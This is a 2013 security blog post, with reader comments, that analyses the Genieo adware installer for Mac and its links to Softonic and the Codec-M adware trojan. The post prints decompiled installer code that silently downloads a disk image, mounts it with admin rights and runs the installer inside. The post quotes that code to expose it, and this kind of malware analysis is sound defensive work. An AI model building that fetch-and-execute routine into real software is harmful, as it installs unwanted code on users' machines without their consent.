OFFICIAL SECURITY BLOG

We’ve moved! You can now read the latest and greatest on Mac adware and malware at Malwarebytes.

More details on Genieo adware

Published May 23rd, 2013 at 4:16 PM EST , modified May 23rd, 2013 at 4:19 PM EST

On Tuesday, I posted an article about a potentially malicious Genieo installer. This has resulted in a couple anti-virus companies labeling the Genieo software as a trojan. Intego revealed an interesting discovery, and I’ve also been pursuing some interesting points myself. There are some interesting developments that call into question whether this is just an isolated incident involving one of Genieo’s partners, or a problem with Genieo itself.

Intego posted an update today in which they revealed the discovery of code indicating that Softonic has some involvement with Genieo. Regular readers will remember that I called for a boycott of Softonic last month, due to inclusion of adware in free software downloads that should not have contained it. It’s unclear exactly what the relationship between Softonic and Genieo is, but one thing is for sure: Softonic is listed (as “softonic2”) as a partner on Genieo’s Download Helper page.

Genieo partner Softonic

I have also been investigating claims that there is a reference to Codec-M in the Genieo installer. Codec-M, aka FkCodec, was an adware trojan that disguised itself as a video codec. It was discovered a little more than a year ago, and I described it at the time in an article titled OSX/FkCodec-A in action. Thus, the idea that there may be a connection between Codec-M and Genieo is quite concerning.

Searching the code in the installer’s executable file does indeed reveal a link to a codecm.dmg file, hosted at download.genieo.com for a partner named “webpic.” Trying to load that link in a web browser results in an odd error message suggesting that the file may require some kind of authentication to retrieve.

Further exploration of the code reveals the function that accesses that string:

function methImpl_UpdaterMacAppDelegate_install3rdPartyAppsForWebpic {
    var_24 = rdi;
    rax = [NSURL URLWithString:@"http://download.genieo.com/partner/webpic/mac_release/live/codecm.dmg"];
    rax = [NSURLRequest requestWithURL:rax cachePolicy:0x0 timeoutInterval:r8];
    r12 = rax;
    var_40 = 0x0;
    var_32 = 0x0;
    rbx = 0x0;
    r14 = &var_32;
    r13 = &var_40;

loc_10000450c:
    var_32 = 0x0;
    rax = [*bind__OBJC_CLASS_$_NSURLConnection sendSynchronousRequest:r12 returningResponse:r13 error:r14];
    if (var_32 != 0x0) goto loc_0x100004558;
    goto loc_100004534;

loc_100004558:
    sleep(0x1e);
    if (rbx + 0x1 != 0x3) goto loc_0x10000450c;

loc_100004613:
    rdx = @"&3rdPartyInstalled_codecm=no";

loc_10000461a:
    rax = [var_24 reportToAnalytics:edx];
    return rax;

loc_100004534:
    rax = [rax writeToFile:@"/tmp/codecm.dmg" atomically:0x1];
    if (rax != 0x0) goto loc_0x10000463a;
    goto loc_100004558;

loc_10000463a:
    rax = [NSArray alloc];
    rdi = rax;
    rax = [rdi initWithObjects:@"mount", @"/tmp/codecm.dmg", @"-mountpoint", @"/Volumes/codecm"];
    rax = [rax autorelease];
    rax = [var_24 runWithArgs:@"/usr/bin/hdiutil" args:rax wait:0x1 asAdmin:0x1];
    if (rax == 0x0) goto loc_0x100004613;
    rax = [var_24 runWithArgs:@"/Volumes/Codec-M Installer/Codec-M Installer.app/Contents/MacOS/Installer" args:0x0 wait:0x1 asAdmin:0x0];
    rbx = rax;
    rax = [r13 alloc];
    rdi = rax;
    rax = [rdi initWithObjects:@"unmount", @"/Volumes/codecm", @"-quiet", 0x0];
    rax = [rax autorelease];
    [var_24 runWithArgs:@"/usr/bin/hdiutil" args:rax wait:0x1 asAdmin:0x1];
    rdx = @"&3rdPartyInstalled_codecm=yes";
    if (rbx != 0x0) goto loc_0x10000461a;
    goto loc_100004613;
}

This is a lot to wade through, but if I’m reading it right, it boils down to downloading that file, mounting the downloaded disk image file and running the installer it contains. (Incidentally, the path listed for the installer executable exactly matches my sample of the installer for the Codec-M trojan.)

Further, it should be noted that this code is found not just in the custom installer for the genTugM partner, but also in the “plain vanilla” installer downloaded directly from the Genieo website. I also found other similar functions for other partners, including one for Qtrax, a digital music service that has had some legal issues, including possible piracy violations. (The Qtrax function installs Microsoft Silverlight and the Qtrax Player app.)

All in all, this is starting to look like Genieo is less a company wronged by its partner, and more a company engaged in some very shady dealings, potentially including the installation of known malware.

Tags: , , , , ,

14 Comments

  • Jon Hendry says:

    For what it’s worth, Genieo’s official twitter account’s last activity was April 19th, retweeting its CEO/co-founder Sol Tzvi announcing that they were looking to buy more Mac OS traffic, with a link to a post on LinkedIn.

    https://twitter.com/soltzvi/status/325190392221945856

    From LinkedIn: “Hi guys, we are looking for quality Mac OS traffic (PPI model) High volume only!
    Please contact: partners@genieo.com subject: Mac Traffic”

    The next tweet on the Genieo account is from a month earlier, just a self-promoting tweet.

  • Genieo Team says:

    Hi Thomas,

    I do not know what is FkCodec so I believe you when you say it is not a nice thing.

    But, can you please explain how did you get from Codec-M, to FkCodec?
    I could not find any references to this (other then your post) on the internet.

  • Genieo Team says:

    Referring me to another article posted by you is not really a good reference.

    Beside to even you say it is easily uninstalled and does not harm the computer.

    So why do you call it a malware I still don’t know.

    • Thomas says:

      If you don’t like reading about my own experience with Codec-M, go to the link in the first sentence of that article and read what Sophos had to say. I classify Codec-M as malware (and I’m obviously not alone here) because it calls itself a video codec, yet it is not. It is adware that perpetrates click fraud.

      You’re avoiding the issue. Why does the Genieo installer – including the one downloaded directly from the Genieo home page – include code that appears to install Codec-M, which is classified as malware by multiple security companies?

      • Someone says:

        Um, anyone notice that the person challenging Thomas is called “Genieo Team?” You can make your own hypotheses about the identity of this person.

  • Genieo Team says:

    Yes, I’m a Genieo employee and I’m not hiding it.
    I’m not challenging anyone, I’m just trying to understand things.

    As for the codec-m issue,
    I can give you a full explanation on how and why its (disabled) in Genieo code.
    Instead, we have removed it completely from our code and as we release new updates it will be deleted from all Genieo client out there (and will not be in new ones).

    • Thomas says:

      Removing the code to install malware after getting caught red-handed is no substitute for explaining why it was there in the first place. It should go without saying, but no explanation = no credibility.

    • Someone says:

      I don’t want to be a pain, and raise a dead issue, but I kinda have to. You said, and I quote, “Referring me to another article posted by you is not really a good reference.” And you also said, and I quote, “Yes, I’m a Genieo employee and I’m not hiding it.” Since you are a Genieo employee, that implies that Genieo is paying you to challenge Thomas’s discrediting your crapware. Therefore, you are not a reliable source of information or “a good reference.”

      Technically, this can be classified as hypocrisy of the highest (or rather, lowest) order.

  • Damien says:

    This doesn’t surprise me in the slightest. Any company whose business model relies on tricking the end user into installing their software can’t be trusted. This is why I actively block the installation of Genieo (and MacKeeper) on the 1000+ Macs that I oversee.

  • #thevirtualcurtain says:

    Y U NO RESPOND GENIEO TEAM?

    • Someone says:

      Why doesn’t Genieo Team respond to what? Genieo reps have been quite.. um… vocal… in argument with this article. Read some of the past comments.

      IMHO, Genieo has no more to say. Actions (and adware) speak louder than words…

This post is more than 90 days old and has been locked. No further comments are allowed.